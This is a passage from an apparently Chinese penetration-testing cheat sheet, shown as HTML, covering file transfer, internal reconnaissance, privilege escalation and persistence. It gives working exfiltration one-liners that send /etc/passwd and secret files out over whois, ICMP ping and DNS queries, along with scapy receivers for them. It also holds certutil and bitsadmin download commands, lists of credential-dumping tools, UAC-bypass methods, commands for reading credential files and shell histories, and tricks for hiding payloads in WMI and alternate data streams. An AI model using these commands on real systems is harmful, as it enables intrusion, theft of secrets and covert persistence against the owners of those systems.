#babed8">curl_close($ch);</span></span><span class="line"><span style="color: #babed8">file_put_contents($path, $data);</span></span><span class="line"><span style="color: #babed8">?></span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行:php test.php</p></blockquote><p>NC<br>attacker </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre 
class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">cat file | nc -l 1234</span></span></code></pre></div><p>target</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nc host_ip 1234 > file</span></span></code></pre></div><p>FTP</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ftp 127.0.0.1 username password get file exit</span></span></code></pre></div><p>TFTP </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">tftp -i host GET C:%homepath%file location_of_file_on_tftp_server</span></span></code></pre></div><p>Bitsadmin </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">bitsadmin /transfer n http://domain/file c:%homepath%file</span></span></code></pre></div><p>Window 文件共享 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">net use x: \127.0.0.1\share /user:example.comuserID myPassword</span></span></code></pre></div><p>SCP<br>本地到远程 </p><div class="language-txt"><button title="Copy code" 
class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">scp file user@host.com:/tmp</span></span></code></pre></div><p>远程到本地 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">scp user@host.com:/tmp file</span></span></code></pre></div><p>rsync<br>远程rsync服务器中拷贝文件到本地机 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">rsync -av root@192.168.78.192::www /databack</span></span></code></pre></div><p>本地机器拷贝文件到远程rsync服务器 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">rsync -av /databack root@192.168.78.192::www</span></span></code></pre></div><p>certutil.exe </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">certutil.exe -urlcache -split -f http://site.com/file</span></span></code></pre></div><p>copy</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">copy \\IP\ShareName\file.exe file.exe</span></span></code></pre></div><p>WHOIS<br>接收端 Host 
B:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nc -vlnp 1337 | sed "s/ //g" | base64 -d </span></span></code></pre></div><p>发送端 Host A:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">whois -h host_ip -p 1337 `cat /etc/passwd | base64`</span></span></code></pre></div><p><a href="https://twitter.com/mubix/status/1102780436118409216">WHOIS + TAR</a><br>First: </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it</span></span></code></pre></div><p>Next</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits</span></span></code></pre></div><p>Finally</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out</span></span></code></pre></div><p>PING<br>发送端:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span 
class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done</span></span></code></pre></div><p>Receiver, <code>ping_receiver.py</code>:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">import sys</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">try:</span></span><span class="line"><span style="color: #babed8">    from scapy.all import *</span></span><span class="line"><span style="color: #babed8">except ImportError:</span></span><span class="line"><span style="color: #babed8">    print("Scapy not found, please install scapy: pip install scapy")</span></span><span class="line"><span style="color: #babed8">    sys.exit(0)</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">def process_packet(pkt):</span></span><span class="line"><span style="color: #babed8">    # each echo request (type 8) carries the 4-byte pattern given to ping -p at the end of its payload</span></span><span class="line"><span style="color: #babed8">    if pkt.haslayer(ICMP):</span></span><span class="line"><span style="color: #babed8">        if pkt[ICMP].type == 8:</span></span><span class="line"><span style="color: #babed8">            data = pkt[ICMP].load[-4:]</span></span><span class="line"><span style="color: #babed8">            print(f'{data.decode("utf-8")}', flush=True, end="", sep="")</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">sniff(iface="eth0", prn=process_packet)</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python3 ping_receiver.py</span></span></code></pre></div><p>DIG<br>Sender:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done</span></span></code></pre></div><p>Receiver, <code>dns_reciver.py</code>:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">import sys</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">try:</span></span><span class="line"><span style="color: #babed8">    from scapy.all import *</span></span><span class="line"><span style="color: #babed8">except ImportError:</span></span><span class="line"><span style="color: #babed8">    print("Scapy not found, please install scapy: pip install scapy")</span></span><span class="line"><span style="color: #babed8">    sys.exit(0)</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">def process_packet(pkt):</span></span><span class="line"><span style="color: #babed8">    if pkt.haslayer(DNS):</span></span><span class="line"><span style="color: #babed8">        domain = pkt[DNS][DNSQR].qname.decode('utf-8')</span></span><span class="line"><span style="color: #babed8">        root_domain = domain.split('.')[1]</span></span><span class="line"><span style="color: #babed8">        if root_domain.startswith('gooogle'):</span></span><span class="line"><span style="color: #babed8">            # strip the trailing ".gooogle.com." (13 characters) and decode the hex label</span></span><span class="line"><span style="color: #babed8">            print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">sniff(iface="eth0", prn=process_packet)</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python3 dns_reciver.py</span></span></code></pre></div><p>…</p><h3 id="搭建-HTTP-server"><a href="#搭建-HTTP-server" class="headerlink" title="搭建 HTTP server"></a>Set up an HTTP server</h3><p>python2</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python -m SimpleHTTPServer 1337</span></span></code></pre></div><p>python3</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python -m http.server 1337</span></span></code></pre></div><p>PHP 5.4+</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">php -S 0.0.0.0:1337</span></span></code></pre></div><p>ruby</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: 
#1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ruby -run -e httpd . -p 1337</span></span></code></pre></div><p>Perl</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 ? "./$1 |" : $1) if /^GET \/(.*) / })'</span></span></code></pre></div><p>busybox httpd</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">busybox httpd -f -p 8000</span></span></code></pre></div><h2 id="内网信息搜集"><a href="#内网信息搜集" class="headerlink" title="内网信息搜集"></a>Internal network information gathering</h2><h3 id="本机信息搜集"><a href="#本机信息搜集" class="headerlink" title="本机信息搜集"></a>Local host information gathering</h3><h4 id="1、用户列表"><a href="#1、用户列表" class="headerlink" title="1、用户列表"></a>1. User list</h4><p>Windows user list<br>Analyze mail users: internal (domain) mail users are usually internal (domain) users</p><h4 id="2、进程列表"><a href="#2、进程列表" class="headerlink" title="2、进程列表"></a>2. Process list</h4><p>Analyze antivirus/security monitoring tools, etc.<br>Mail clients<br>VPN<br>FTP, etc.</p><h4 id="3、服务列表"><a href="#3、服务列表" class="headerlink" title="3、服务列表"></a>3. Service list</h4><p>Services related to security tools (determine whether they can be switched off manually, etc.)<br>Problematic services (permissions/vulnerabilities)</p><h4 id="4、端口列表"><a href="#4、端口列表" class="headerlink" title="4、端口列表"></a>4. Port list</h4><p>Common services/applications behind the open ports (anonymous access/permissions/vulnerabilities, etc.)<br>Use the open ports for information gathering</p><h4 id="5、补丁列表"><a href="#5、补丁列表" class="headerlink" title="5、补丁列表"></a>5. Patch list</h4><p>Analyze Windows patches<br>Third-party software (Java/Oracle/Flash, etc.) vulnerabilities</p><h4 id="6、本机共享"><a href="#6、本机共享" class="headerlink" title="6、本机共享"></a>6. Local shares</h4><p>Local share list/access permissions<br>Domain shares accessed from this host/access permissions</p><h4 id="7、本用户习惯分析"><a href="#7、本用户习惯分析" class="headerlink" title="7、本用户习惯分析"></a>7. Current user habit analysis</h4><p>History<br>Bookmarks<br>Documents, etc.</p><h4 id="8、获取当前用户密码工具"><a href="#8、获取当前用户密码工具" class="headerlink" title="8、获取当前用户密码工具"></a>8. Tools for obtaining the current user's passwords</h4><h5 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h5><ul><li><a href="https://github.com/gentilkiwi/mimikatz">mimikatz</a></li><li><a href="https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64">wce</a></li><li><a href="https://github.com/peewpw/Invoke-WCMDump">Invoke-WCMDump</a></li><li><a href="https://github.com/giMini/mimiDbg">mimiDbg</a></li><li><a href="https://github.com/AlessandroZ/LaZagne">LaZagne</a></li><li><a href="http://launcher.nirsoft.net/downloads/">nirsoft_package</a></li><li><a href="https://github.com/quarkslab/quarkspwdump">QuarksPwDump</a></li><li><a href="https://github.com/mcandre/fgdump">fgdump</a></li><li>Asterisk password revealers, etc.</li></ul><h5 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h5><ul><li><a href="https://github.com/AlessandroZ/LaZagne">LaZagne</a></li><li><a href="https://github.com/huntergregal/mimipenguin">mimipenguin</a></li></ul><h5 id="浏览器"><a href="#浏览器" class="headerlink" title="浏览器"></a>Browser</h5><ul><li><a href="https://github.com/moonD4rk/HackBrowserData">HackBrowserData</a></li><li><a href="https://github.com/djhohnstein/SharpWeb">SharpWeb</a></li><li><a href="https://github.com/GhostPack/SharpDPAPI">SharpDPAPI</a></li><li><a href="https://github.com/hayasec/360SafeBrowsergetpass">360SafeBrowsergetpass</a></li></ul><h5 id="其他"><a href="#其他" class="headerlink" title="其他"></a>Other</h5><ul><li><a href="https://github.com/RcoIl/SharpDecryptPwd">SharpDecryptPwd</a></li><li><a href="https://github.com/TideSec/Decrypt_Weblogic_Password">Decrypt_Weblogic_Password</a></li><li><a href="https://github.com/jas502n/OA-Seeyou">OA-Seeyou</a></li></ul><h3 id="扩散信息收集"><a href="#扩散信息收集" class="headerlink" title="扩散信息收集"></a>Expanded information gathering</h3><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port scanning</h4><h5 id="常用端口扫描工具"><a href="#常用端口扫描工具" class="headerlink" title="常用端口扫描工具"></a>Common port scanning tools</h5><ul><li><a href="https://nmap.org/">nmap</a></li><li><a href="https://github.com/robertdavidgraham/masscan">masscan</a></li><li><a href="https://github.com/zmap/zmap">zmap</a></li><li>s扫描器 (S scanner)</li><li>Custom scripts, etc.</li><li>NC</li><li>…</li></ul><h4 id="内网拓扑架构分析"><a href="#内网拓扑架构分析" class="headerlink" title="内网拓扑架构分析"></a>Internal network topology analysis</h4><ul><li>DMZ</li><li>Management network</li><li>Production network</li><li>Test network</li></ul><h4 id="常见信息收集命令"><a href="#常见信息收集命令" class="headerlink" title="常见信息收集命令"></a>Common information gathering commands</h4><p>ipconfig:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ipconfig /all ------> query the local IP range, the domain the host belongs to, etc.</span></span></code></pre></div><p>net:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">net user ------> local user list</span></span><span class="line"><span style="color: #babed8">net localgroup administrators ------> local administrators (usually includes domain users)</span></span><span class="line"><span style="color: #babed8">net user /domain ------> query domain users</span></span><span class="line"><span style="color: #babed8">net group /domain ------> query groups in the domain</span></span><span class="line"><span style="color: #babed8">net group "domain admins" /domain ------> query the domain admins group</span></span><span class="line"><span style="color: #babed8">net localgroup administrators /domain ------> domain administrators logged on to this host</span></span><span class="line"><span style="color: #babed8">net localgroup administrators workgroup\user001 /add ------> add a domain user to the local administrators group</span></span><span class="line"><span style="color: #babed8">net group "Domain controllers" ------> list domain controllers (if there are several)</span></span><span class="line"><span style="color: #babed8">net view ------> list machines in the same domain</span></span><span class="line"><span style="color: #babed8">net view /domain ------> list domains</span></span><span class="line"><span style="color: #babed8">net view /domain:domainname</span></span></code></pre></div><p>dsquery</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">dsquery computer domainroot -limit 65535 && net group "domain computers" /domain ------> list all machine names in the domain</span></span><span class="line"><span style="color: #babed8">dsquery user domainroot -limit 65535 && net user /domain ------> list all user names in the domain</span></span><span class="line"><span style="color: #babed8">dsquery subnet ------> list the subnets defined in the domain</span></span><span class="line"><span style="color: #babed8">dsquery group && net group /domain ------> list groups in the domain</span></span><span class="line"><span style="color: #babed8">dsquery ou ------> list organizational units in the domain</span></span><span class="line"><span style="color: #babed8">dsquery server && net time /domain ------> list domain controllers in the domain</span></span></code></pre></div><h3 id="第三方信息收集"><a href="#第三方信息收集" class="headerlink" title="第三方信息收集"></a>Third-party information gathering</h3><ul><li>NETBIOS information gathering</li><li>SMB information gathering</li><li>Null session information gathering</li><li>Vulnerability information gathering, etc.</li></ul><h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>Privilege escalation</h2><h3 id="Windows-1"><a href="#Windows-1" class="headerlink" title="Windows"></a>Windows</h3><h4 id="BypassUAC"><a href="#BypassUAC" class="headerlink" title="BypassUAC"></a>BypassUAC</h4><h5 id="常用方法"><a href="#常用方法" class="headerlink" 
title="常用方法"></a>Common methods</h5><ul><li>Using the IFileOperation COM interface</li><li>Using the extract option of Wusa.exe</li><li>Remote injection of shellcode into a puppet process</li><li>DLL hijacking of system DLL files</li><li>eventvwr.exe and registry hijacking</li><li>sdclt.exe</li><li>SilentCleanup</li><li>wscript.exe</li><li>cmstp.exe</li><li>Modifying environment variables to hijack high-privilege .NET programs</li><li>Modifying the registry key HKCU\Software\Classes\CLSID to hijack high-privilege programs</li><li>Escalating privileges directly past UAC</li></ul><h5 id="常用工具"><a href="#常用工具" class="headerlink" title="常用工具"></a>Common tools</h5><ul><li><a href="https://github.com/hfiref0x/UACME">UACME</a></li><li><a href="https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC">Bypass-UAC</a></li><li><a href="https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko">Yamabiko</a></li><li>…</li></ul><h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Escalation</h4><ul><li>Windows kernel vulnerability escalation</li></ul><blockquote><p>Detection: <a href="https://github.com/GDSSecurity/Windows-Exploit-Suggester">Windows-Exploit-Suggester</a>, <a href="https://github.com/brianwrf/WinSystemHelper">WinSystemHelper</a>, <a href="https://github.com/bitsadmin/wesng">wesng</a></p></blockquote><blockquote><p>Exploitation: <a href="https://github.com/SecWiki/windows-kernel-exploits">windows-kernel-exploits</a>, <a href="https://github.com/AlessandroZ/BeRoot.git">BeRoot</a></p></blockquote><ul><li>Service escalation</li></ul><blockquote><p>Database services, FTP services, etc.</p></blockquote><ul><li>Windows system misconfiguration</li><li>Misconfigured system service permissions</li><li>Insecure registry permissions</li><li>Insecure file/folder permissions</li><li>Scheduled tasks</li><li>Any user can install MSI packages as NT AUTHORITY\SYSTEM</li><li>Escalation scripts</li></ul><blockquote><p><a href="https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1">PowerUp</a>, <a href="https://github.com/rsmudge/ElevateKit">ElevateKit</a></p></blockquote><h3 id="Linux-1"><a href="#Linux-1" class="headerlink" title="Linux"></a>Linux</h3><h4 id="内核溢出提权"><a href="#内核溢出提权" class="headerlink" title="内核溢出提权"></a>Kernel overflow escalation</h4><p><a href="https://github.com/SecWiki/linux-kernel-exploits">linux-kernel-exploits</a></p><h4 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>Scheduled tasks</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">crontab -l</span></span><span class="line"><span style="color: #babed8">ls -alh /var/spool/cron</span></span><span class="line"><span style="color: #babed8">ls -al /etc/ | grep cron</span></span><span class="line"><span style="color: #babed8">ls -al /etc/cron*</span></span><span class="line"><span style="color: #babed8">cat /etc/cron*</span></span><span class="line"><span style="color: #babed8">cat /etc/at.allow</span></span><span class="line"><span style="color: #babed8">cat /etc/at.deny</span></span><span class="line"><span style="color: #babed8">cat /etc/cron.allow</span></span><span class="line"><span style="color: #babed8">cat /etc/cron.deny</span></span><span class="line"><span style="color: #babed8">cat /etc/crontab</span></span><span class="line"><span style="color: #babed8">cat /etc/anacrontab</span></span><span class="line"><span style="color: #babed8">cat /var/spool/cron/crontabs/root</span></span></code></pre></div><h4 id="SUID"><a href="#SUID" class="headerlink" title="SUID"></a>SUID</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: 
#babed8">find / -user root -perm -4000 -print 2>/dev/null</span></span><span class="line"><span style="color: #babed8">find / -perm -u=s -type f 2>/dev/null</span></span><span class="line"><span style="color: #babed8">find / -user root -perm -4000 -exec ls -ldb {} \;</span></span></code></pre></div><p>Find exploitable binaries: <a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p><h4 id="系统服务的错误权限配置漏洞"><a href="#系统服务的错误权限配置漏洞" class="headerlink" title="系统服务的错误权限配置漏洞"></a>Misconfigured system service permissions</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">cat /var/apache2/config.inc</span></span><span class="line"><span style="color: #babed8">cat /var/lib/mysql/mysql/user.MYD</span></span><span class="line"><span style="color: #babed8">cat /root/anaconda-ks.cfg</span></span></code></pre></div><h4 id="不安全的文件-文件夹权限配置"><a href="#不安全的文件-文件夹权限配置" class="headerlink" title="不安全的文件/文件夹权限配置"></a>Insecure file/folder permissions</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">cat ~/.bash_history</span></span><span class="line"><span style="color: #babed8">cat ~/.nano_history</span></span><span class="line"><span style="color: #babed8">cat ~/.atftp_history</span></span><span class="line"><span style="color: #babed8">cat ~/.mysql_history</span></span><span class="line"><span style="color: #babed8">cat ~/.php_history</span></span></code></pre></div><h4 id="找存储的明文用户名,密码"><a href="#找存储的明文用户名,密码" class="headerlink" title="找存储的明文用户名,密码"></a>Find stored plaintext user names and passwords</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">grep -i user [filename]</span></span><span class="line"><span style="color: #babed8">grep -i pass [filename]</span></span><span class="line"><span style="color: #babed8">grep -C 5 "password" [filename]</span></span><span class="line"><span style="color: #babed8">find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla</span></span></code></pre></div><h2 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>Persistence</h2><h3 id="系统后门"><a href="#系统后门" class="headerlink" title="系统后门"></a>System backdoors</h3><h4 id="Windows-2"><a href="#Windows-2" class="headerlink" title="Windows"></a>Windows</h4><h5 id="1、密码记录工具"><a href="#1、密码记录工具" class="headerlink" title="1、密码记录工具"></a>1. Password logging tools</h5><p>WinlogonHack<br>WinlogonHack is a tool for capturing remote 3389 (RDP) logon passwords. Before WinlogonHack there was a GINA trojan, used mainly to intercept passwords on Windows 2000; WinlogonHack is used mainly to intercept them on Windows XP and Windows 2003 Server.<br>Keyloggers<br>The purpose of installing a keylogger is not only to record local passwords but to record every password the administrator types, such as mailbox and web page passwords, which also yields a great deal of information about the administrator.<br>NTPass<br>Captures administrator passwords. This is normally done the GINA way, but some machines have software such as pcAnywhere installed, which causes remote logon failures; this tool captures passwords without that obstacle.<br>OpenSSH backdoor on Linux<br>A recompiled sshd service that records users' logon passwords.</p><h5 id="2、常用的存储Payload位置"><a href="#2、常用的存储Payload位置" class="headerlink" title="2、常用的存储Payload位置"></a>2. Common payload storage locations</h5><p><strong>WMI</strong>:<br>Store:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)</span></span><span class="line"><span style="color: #babed8">$StaticClass.Name = 'Win32_Command'</span></span><span class="line"><span style="color: #babed8">$StaticClass.Put()</span></span><span class="line"><span style="color: #babed8">$StaticClass.Properties.Add('Command' , $Payload)</span></span><span class="line"><span style="color: #babed8">$StaticClass.Put()</span></span></code></pre></div><p>Read:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value</span></span></code></pre></div><p><strong>PE files with digital signatures</strong><br>Exploit a flaw in the file hashing algorithm to hide a payload inside a PE file without affecting the file's digital signature<br><strong>Special ADS</strong><br>…</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">type putty.exe > ...:putty.exe</span></span><span class="line"><span style="color: #babed8">wmic process call create c:\test\ads\...:putty.exe</span></span></code></pre></div><p>Special COM files</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">type putty.exe > \\.\C:\test\ads\COM1:putty.exe</span></span><span class="line"><span style="color: #babed8">wmic process call create \\.\C:\test\ads\COM1:putty.exe</span></span></code></pre></div><p>Disk root directory</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">type putty.exe >C:\:putty.exe</span></span><span class="line"><span style="color: #babed8">wmic process call create C:\:putty.exe</span></span></code></pre></div><h5 id="3、Run-RunOnce-Keys"><a href="#3、Run-RunOnce-Keys" class="headerlink" title="3、Run/RunOnce Keys"></a>3. Run/RunOnce Keys</h5><p>User level</p><div 
